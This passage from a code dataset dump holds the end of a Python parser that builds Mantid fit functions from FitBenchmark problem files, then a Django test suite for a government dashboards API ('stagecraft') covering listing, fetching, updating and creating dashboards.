\"\"\"\n Get the starting values for the problem\n\n :returns: Starting values for the function\n :rtype: list\n \"\"\"\n ignore = ['name', 'BinWidth', 'ties']\n\n starting_values = [['f{}_{}'.format(i, name), [f[name]]]\n for i, f in enumerate(self._parsed_func)\n for name in f.keys()\n if name not in ignore]\n\n return starting_values\n\n def _get_x_range(self):\n \"\"\"\n Get the x ranges for the problem\n\n :returns: start_x and end_x\n :rtype: float, float\n \"\"\"\n fit_params_str 
= self._entries['fit_parameters'].strip('{').strip('}')\n fit_params = fit_params_str.split(',')\n for f in fit_params:\n name, val = f.split(':')\n name = name.strip().strip('\"').strip(\"'\")\n if name not in ['StartX', 'EndX']:\n continue\n\n try:\n val = float(val.strip())\n except ValueError:\n raise ValueError('Could not parse fit_parameter: {}'.format(f))\n\n if name == 'StartX':\n start_x = val\n else:\n end_x = val\n\n return start_x, end_x\n\n def _fitbenchmark_func_definitions(self):\n \"\"\"\n Processing the function in the FitBenchmark problem definition into a\n python callable.\n\n :returns: A function definition array of one element which contains a\n callable Mantid function and the function parameter values.\n :rtype: list\n \"\"\"\n fit_function = None\n param_vals = []\n\n for f in self._parsed_func:\n name = f['name']\n params = f.copy()\n for key in ['name', 'BinWidth', 'ties']:\n if key in params:\n params.pop(key)\n param_vals.extend(params.values())\n tmp_function = msapi.__dict__[name](**params)\n if fit_function is None:\n fit_function = tmp_function\n else:\n fit_function += tmp_function\n\n for i, f in enumerate(self._parsed_func):\n if 'ties' in f:\n ties = {'f{}.{}'.format(i, tie): val\n for tie, val in f['ties'].items()}\n fit_function.tie(ties)\n\n function_def = [[fit_function, param_vals]]\n\n return function_def\n", "sub_path": "fitbenchmarking/parsing/fitbenchmark_parser.py", "file_name": "fitbenchmark_parser.py", "file_ext": "py", "file_size_in_byte": 8914, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "fitbenchmarking.parsing.base_parser.Parser", "line_number": 17, "usage_type": "name"}, {"api_name": "fitbenchmarking.parsing.fitting_problem.FittingProblem", "line_number": 30, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "fitbenchmarking.utils.logging_setup.logger.error", "line_number": 82, "usage_type": "call"}, {"api_name": "fitbenchmarking.utils.logging_setup.logger", "line_number": 82, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 121, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 194, "usage_type": "call"}, {"api_name": "mantid.simpleapi.__dict__", "line_number": 265, "usage_type": "attribute"}, {"api_name": "mantid.simpleapi", "line_number": 265, "usage_type": "name"}]} +{"seq_id": "441282276", "text": "from __future__ import unicode_literals\nimport json\n\nfrom django.test import TestCase\nfrom hamcrest import (\n assert_that, equal_to, is_, none, has_property,\n contains, has_entry, has_entries\n)\nfrom django_nose.tools import assert_redirects\nfrom mock import patch\n\nfrom stagecraft.apps.dashboards.tests.factories.factories import(\n DashboardFactory, DepartmentFactory, ModuleTypeFactory, ModuleFactory)\nfrom stagecraft.apps.dashboards.models.dashboard import (\n Dashboard)\nfrom stagecraft.apps.dashboards.views.dashboard import(\n recursively_fetch_dashboard)\nfrom stagecraft.libs.authorization.tests.test_http import (\n with_govuk_signon)\nfrom stagecraft.libs.views.utils import to_json\nfrom 
stagecraft.libs.views.utils import JsonEncoder\n\n\nclass DashboardViewsListTestCase(TestCase):\n\n @patch(\n \"stagecraft.apps.dashboards.models.\"\n \"dashboard.Dashboard.list_for_spotlight\")\n def test_get_dashboards_without_slug_returns_minimal_dashboards_json(\n self,\n patch_list_for_spotlight):\n returned_data = [\n {'i am in a list': 'this is a list'},\n {'more things in a list': 'yes'}]\n patch_list_for_spotlight.return_value = returned_data\n resp = self.client.get(\n '/public/dashboards', {})\n assert_that(resp.status_code, equal_to(200))\n assert_that(\n len(json.loads(resp.content)),\n equal_to(2)\n )\n assert_that(\n json.loads(resp.content)[0],\n has_entries(returned_data[0])\n )\n assert_that(\n json.loads(resp.content)[1],\n has_entries(returned_data[1])\n )\n\n def test_get_dashboards_with_slug_query_param_returns_dashboard_json(self):\n DashboardFactory(slug='my_first_slug')\n resp = self.client.get(\n '/public/dashboards', {'slug': 'my_first_slug'})\n assert_that(json.loads(resp.content), has_entry('slug',\n 'my_first_slug'))\n assert_that(resp['Cache-Control'], equal_to('max-age=300'))\n\n def test_get_dashboards_only_caches_when_published(self):\n DashboardFactory(slug='published_dashboard')\n DashboardFactory(slug='unpublished_dashboard', published=False)\n\n resp = self.client.get(\n '/public/dashboards', {'slug': 'published_dashboard'})\n assert_that(resp['Cache-Control'], equal_to('max-age=300'))\n\n resp = self.client.get(\n '/public/dashboards', {'slug': 'unpublished_dashboard'})\n assert_that(resp['Cache-Control'], equal_to('no-cache'))\n\n @patch(\n 'stagecraft.apps.dashboards.models.dashboard.Dashboard.spotlightify')\n def test_get_dashboards_with_slug_query_param_returns_404_if_no_dashboard(\n self,\n spotlightify_patch):\n resp = self.client.get(\n '/public/dashboards', {'slug': 'my_first_slug'})\n assert_that(json.loads(resp.content), equal_to(\n {\n u'status': u'error',\n u'message': u\"No dashboard with slug 'my_first_slug' exists\"}))\n assert_that(resp.status_code, equal_to(404))\n\n def test_recursively_fetch_dashboard_recurses_down_the_slug_fragments(\n self):\n dashboard = DashboardFactory(slug='experimental/my_first_slug')\n slug = 'experimental/my_first_slug/another/thing'\n returned_dashboard = recursively_fetch_dashboard(slug)\n assert_that(dashboard.id, equal_to(returned_dashboard.id))\n\n def test_recursively_fetch_dashboard_returns_none_after_3_levels(\n self):\n DashboardFactory(slug='my_first_slug')\n slug = 'my_first_slug/some_url_fragment/another/another'\n returned_dashboard = recursively_fetch_dashboard(slug)\n assert_that(returned_dashboard, is_(none()))\n\n @patch(\n 'stagecraft.apps.dashboards.models.dashboard.Dashboard.spotlightify'\n )\n def test_public_dashboards_with_forward_slash_redirects(\n self,\n spotlightify_patch):\n resp = self.client.get(\n '/public/dashboards/', {'slug': 'my_first_slug'})\n assert_redirects(\n resp,\n 'http://testserver/public/dashboards?slug=my_first_slug',\n status_code=301,\n target_status_code=404)\n\n def test_modules_are_ordered_correctly(self):\n dashboard = DashboardFactory(slug='my-first-slug')\n module_type = ModuleTypeFactory()\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n order=2, slug='slug2')\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n order=1, slug='slug1')\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n order=3, slug='slug3')\n\n resp = self.client.get(\n '/public/dashboards', {'slug': 'my-first-slug'})\n\n data = json.loads(resp.content)\n 
assert_that(data['modules'],\n contains(\n has_entry('slug', 'slug1'),\n has_entry('slug', 'slug2'),\n has_entry('slug', 'slug3')))\n\n def test_dashboard_with_module_slug_only_returns_module(self):\n dashboard = DashboardFactory(slug='my-first-slug')\n module_type = ModuleTypeFactory()\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n slug='module-we-want')\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n slug='module-we-dont-want')\n resp = self.client.get(\n '/public/dashboards', {'slug': 'my-first-slug/module-we-want'})\n data = json.loads(resp.content)\n assert_that(data['modules'],\n contains(has_entry('slug', 'module-we-want')))\n assert_that(data, has_entry('page-type', 'module'))\n\n def test_dashboard_with_non_existing_module_slug_returns_nothing(self):\n dashboard = DashboardFactory(slug='my-first-slug')\n module_type = ModuleTypeFactory()\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n slug='module-we-want')\n resp = self.client.get(\n '/public/dashboards', {'slug': 'my-first-slug/nonexisting-module'})\n data = json.loads(resp.content)\n assert_that(data, has_entry('status', 'error'))\n\n def test_dashboard_with_tab_slug_only_returns_tab(self):\n dashboard = DashboardFactory(slug='my-first-slug')\n module_type = ModuleTypeFactory()\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n slug='module-we-want',\n info=['module-info'],\n title='module-title',\n options={\n 'tabs': [\n {\n 'slug': 'tab-we-want',\n 'title': 'tab-title'\n },\n {\n 'slug': 'tab-we-dont-want',\n }\n ]\n })\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n slug='module-we-dont-want')\n resp = self.client.get(\n '/public/dashboards',\n {'slug': 'my-first-slug/module-we-want/module-we-want-tab-we-want'}\n )\n data = json.loads(resp.content)\n assert_that(data['modules'],\n contains(\n has_entries({'slug': 'tab-we-want',\n 'info': contains('module-info'),\n 'title': 'module-title - tab-title'\n })))\n assert_that(data, has_entry('page-type', 'module'))\n\n def test_dashboard_with_nonexistent_tab_slug_returns_nothing(self):\n dashboard = DashboardFactory(slug='my-first-slug')\n module_type = ModuleTypeFactory()\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n slug='module',\n info=['module-info'],\n title='module-title',\n options={\n 'tabs': [\n {\n 'slug': 'tab-we-want',\n 'title': 'tab-title'\n },\n {\n 'slug': 'tab-we-dont-want',\n }\n ]\n })\n ModuleFactory(\n type=module_type, dashboard=dashboard,\n slug='module-we-dont-want')\n resp = self.client.get(\n '/public/dashboards',\n {'slug': 'my-first-slug/module/module-non-existent-tab'}\n )\n data = json.loads(resp.content)\n assert_that(data, has_entry('status', 'error'))\n\n\nclass DashboardViewsGetTestCase(TestCase):\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_get_a_dashboard_with_incorrect_id_or_no_id_returns_404(self):\n resp = self.client.get(\n '/dashboard/', HTTP_AUTHORIZATION='Bearer correct-token'\n )\n second_response = self.client.get(\n '/dashboard/non-existant-m8',\n HTTP_AUTHORIZATION='Bearer correct-token'\n )\n\n assert_that(resp.status_code, equal_to(404))\n assert_that(second_response.status_code, equal_to(404))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_get_an_existing_dashboard_returns_a_dashboard(self):\n dashboard = DashboardFactory()\n\n resp = self.client.get(\n '/dashboard/{}'.format(dashboard.id),\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(200))\n assert_that(\n json.loads(resp.content),\n 
has_entries(\n {\n \"description_extra\": \"\",\n \"strapline\": \"Dashboard\",\n \"description\": \"\",\n \"links\": [],\n \"title\": \"title\",\n \"tagline\": \"\",\n \"organisation\": None,\n \"modules\": [],\n \"dashboard_type\": \"transaction\",\n \"slug\": \"slug1\",\n \"improve_dashboard_message\": True,\n \"customer_type\": \"\",\n \"costs\": \"\",\n \"page_type\": \"dashboard\",\n \"published\": True,\n \"business_model\": \"\",\n \"other_notes\": \"\"\n }\n )\n )\n\n\nclass DashboardViewsUpdateTestCase(TestCase):\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_change_title_of_dashboard_changes_title_of_dashboard(self):\n dashboard = DashboardFactory()\n dashboard_data = dashboard.serialize()\n\n dashboard_data['title'] = 'foo'\n\n resp = self.client.put(\n '/dashboard/{}'.format(dashboard.id),\n json.dumps(dashboard_data, cls=JsonEncoder),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(200))\n assert_that(\n Dashboard.objects.get(id=dashboard.id).title, equal_to('foo')\n )\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_putting_to_nonexistant_dashboard_returns_404(self):\n dashboard = DashboardFactory()\n dashboard_data = dashboard.serialize()\n\n resp = self.client.put(\n '/dashboard/nonsense',\n json.dumps(dashboard_data, cls=JsonEncoder),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(404))\n\n\nclass DashboardViewsCreateTestCase(TestCase):\n\n def _get_dashboard_payload(self, **kwargs):\n data = {\n \"slug\": \"foo\",\n \"dashboard-type\": \"transaction\",\n \"page-type\": \"dashboard\",\n \"published\": True,\n \"title\": \"Foo dashboard\",\n \"description\": \"This is a foo\",\n \"description-extra\": \"This is some extra\",\n \"costs\": \"eh?\",\n \"other-notes\": \"some other notes\",\n \"customer-type\": \"Business\",\n \"business-model\": \"Department budget\",\n \"improve-dashboard-message\": True,\n \"strapline\": \"Dashboard\",\n \"tagline\": \"This is the tagline\",\n \"organisation\": None,\n \"links\": [\n {\n \"title\": \"External link\",\n \"url\": \"https://www.gov.uk/\",\n \"type\": \"transaction\",\n }\n ],\n }\n for k, v in kwargs.iteritems():\n data[k.replace('_', '-')] = v\n\n return data\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_with_organisation(self):\n department = DepartmentFactory()\n data = self._get_dashboard_payload(\n organisation='{}'.format(department.id))\n\n resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(200))\n assert_that(Dashboard.objects.count(), equal_to(1))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_fails_with_invalid_organisation_uuid(self):\n data = self._get_dashboard_payload(organisation='invalid')\n\n resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(400))\n assert_that(Dashboard.objects.count(), equal_to(0))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_fails_with_non_existent_organisation(self):\n data = self._get_dashboard_payload(\n organisation='7969dcd9-7e9e-4cab-a352-424d57724523')\n\n resp = self.client.post(\n '/dashboard', json.dumps(data),\n 
content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(400))\n assert_that(Dashboard.objects.count(), equal_to(0))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_ok_with_no_organisation(self):\n data = self._get_dashboard_payload(\n organisation=None)\n\n resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(200))\n assert_that(Dashboard.objects.count(), equal_to(1))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_ok_with_links(self):\n data = self._get_dashboard_payload()\n\n resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n dashboard = Dashboard.objects.first()\n\n assert_that(resp.status_code, equal_to(200))\n assert_that(dashboard.link_set.count(), equal_to(1))\n assert_that(dashboard.link_set.all(),\n contains(has_property('title',\n equal_to('External link'))))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_ok_with_modules(self):\n module_type = ModuleTypeFactory()\n\n def make_module(slug, title, order):\n return {\n 'slug': slug,\n 'title': title,\n 'type_id': module_type.id,\n 'description': 'a description',\n 'info': [],\n 'options': {},\n 'order': order,\n }\n\n data = self._get_dashboard_payload()\n data['modules'] = [\n make_module('foo', 'The Foo', 1),\n make_module('bar', 'The Bar', 3),\n make_module('monkey', 'The the', 2),\n ]\n\n resp = self.client.post(\n '/dashboard', to_json(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(200))\n dashboard = Dashboard.objects.first()\n assert_that(dashboard.module_set.count(), equal_to(3))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_fails_with_invalid_module(self):\n module_type = ModuleTypeFactory()\n module = {\n 'slug': 'bad slug',\n 'title': 'bad slug',\n 'type_id': module_type.id,\n 'description': '',\n 'info': [],\n 'options': {},\n 'order': 1,\n }\n data = self._get_dashboard_payload()\n data['modules'] = [module]\n\n resp = self.client.post(\n '/dashboard', to_json(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(400))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_failure_rolls_back_transaction(self):\n module_type = ModuleTypeFactory()\n module = {\n 'slug': 'bad slug',\n 'title': 'bad slug',\n 'type_id': module_type.id,\n 'description': '',\n 'info': [],\n 'options': {},\n 'order': 1,\n }\n data = self._get_dashboard_payload()\n data['modules'] = [module]\n\n resp = self.client.post(\n '/dashboard', to_json(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(400))\n assert_that(Dashboard.objects.count(), equal_to(0))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_create_dashboard_with_reused_slug_is_bad_request(self):\n data = self._get_dashboard_payload()\n\n resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type=\"application/json\",\n HTTP_AUTHORIZATION='Bearer correct-token')\n\n second_resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type=\"application/json\",\n 
HTTP_AUTHORIZATION='Bearer correct-token')\n\n assert_that(resp.status_code, equal_to(200))\n assert_that(second_resp.status_code, equal_to(400))\n assert_that(Dashboard.objects.count(), equal_to(1))\n\n @with_govuk_signon(permissions=['dashboard'])\n def test_dashboard_failing_validation_returns_json_error(self):\n data = {\n 'slug': 'my-dashboard',\n 'title': 'My dashboard',\n 'strapline': 'Invalid',\n }\n\n resp = self.client.post(\n '/dashboard', json.dumps(data),\n content_type='application/json',\n HTTP_AUTHORIZATION='Bearer correct-token')\n response_dictionary = json.loads(resp.content)\n expected_message = \"strapline: Value u'Invalid' is not a valid choice.\"\n\n assert_that(resp.status_code, equal_to(400))\n assert_that(response_dictionary['status'], equal_to('error'))\n assert_that(response_dictionary['message'],\n equal_to(expected_message))\n", "sub_path": "stagecraft/apps/dashboards/tests/views/test_dashboard.py", "file_name": "test_dashboard.py", "file_ext": "py", "file_size_in_byte": 19366, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.test.TestCase", "line_number": 24, "usage_type": "name"}, {"api_name": "hamcrest.assert_that", "line_number": 38, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 38, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 39, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 40, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 41, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 43, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 44, "usage_type": "call"}, {"api_name": "hamcrest.has_entries", "line_number": 45, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 47, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 48, "usage_type": "call"}, {"api_name": "hamcrest.has_entries", "line_number": 49, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 26, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 53, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 56, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 56, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 56, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 58, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 58, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 61, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 62, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 66, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 66, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 70, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 70, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 79, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 79, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 79, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 83, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 83, 
"usage_type": "call"}, {"api_name": "mock.patch", "line_number": 72, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 87, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.views.dashboard.recursively_fetch_dashboard", "line_number": 89, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 90, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 90, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 94, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.views.dashboard.recursively_fetch_dashboard", "line_number": 96, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 97, "usage_type": "call"}, {"api_name": "hamcrest.is_", "line_number": 97, "usage_type": "call"}, {"api_name": "hamcrest.none", "line_number": 97, "usage_type": "call"}, {"api_name": "django_nose.tools.assert_redirects", "line_number": 107, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 99, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 114, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 115, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 116, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 119, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 122, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 129, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 130, "usage_type": "call"}, {"api_name": "hamcrest.contains", "line_number": 131, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 132, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 133, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 134, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 137, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 138, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 139, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 142, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 147, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 148, "usage_type": "call"}, {"api_name": "hamcrest.contains", "line_number": 149, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 149, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 150, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 150, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 153, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 154, "usage_type": "call"}, {"api_name": 
"stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 155, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 160, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 161, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 161, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 164, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 165, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 166, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 182, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 189, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 190, "usage_type": "call"}, {"api_name": "hamcrest.contains", "line_number": 191, "usage_type": "call"}, {"api_name": "hamcrest.has_entries", "line_number": 192, "usage_type": "call"}, {"api_name": "hamcrest.contains", "line_number": 193, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 196, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 196, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 199, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleTypeFactory", "line_number": 200, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 201, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.ModuleFactory", "line_number": 217, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 224, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 225, "usage_type": "call"}, {"api_name": "hamcrest.has_entry", "line_number": 225, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 228, "usage_type": "name"}, {"api_name": "hamcrest.assert_that", "line_number": 240, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 240, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 241, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 241, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 230, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 245, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 251, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 251, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 252, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 253, "usage_type": "call"}, {"api_name": "hamcrest.has_entries", "line_number": 254, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 243, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 278, "usage_type": "name"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 282, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 289, 
"usage_type": "call"}, {"api_name": "stagecraft.libs.views.utils.JsonEncoder", "line_number": 289, "usage_type": "name"}, {"api_name": "hamcrest.assert_that", "line_number": 293, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 293, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 294, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.get", "line_number": 295, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 295, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 295, "usage_type": "name"}, {"api_name": "hamcrest.equal_to", "line_number": 295, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 280, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DashboardFactory", "line_number": 300, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 305, "usage_type": "call"}, {"api_name": "stagecraft.libs.views.utils.JsonEncoder", "line_number": 305, "usage_type": "name"}, {"api_name": "hamcrest.assert_that", "line_number": 309, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 309, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 298, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 312, "usage_type": "name"}, {"api_name": "stagecraft.apps.dashboards.tests.factories.factories.DepartmentFactory", "line_number": 346, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 351, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 355, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 355, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 356, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.count", "line_number": 356, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 356, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 356, "usage_type": "name"}, {"api_name": "hamcrest.equal_to", "line_number": 356, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 344, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 363, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 367, "usage_type": "call"}, {"api_name": "hamcrest.equal_to", "line_number": 367, "usage_type": "call"}, {"api_name": "hamcrest.assert_that", "line_number": 368, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects.count", "line_number": 368, "usage_type": "call"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard.objects", "line_number": 368, "usage_type": "attribute"}, {"api_name": "stagecraft.apps.dashboards.models.dashboard.Dashboard", "line_number": 368, "usage_type": "name"}, {"api_name": "hamcrest.equal_to", "line_number": 368, "usage_type": "call"}, {"api_name": "stagecraft.libs.authorization.tests.test_http.with_govuk_signon", "line_number": 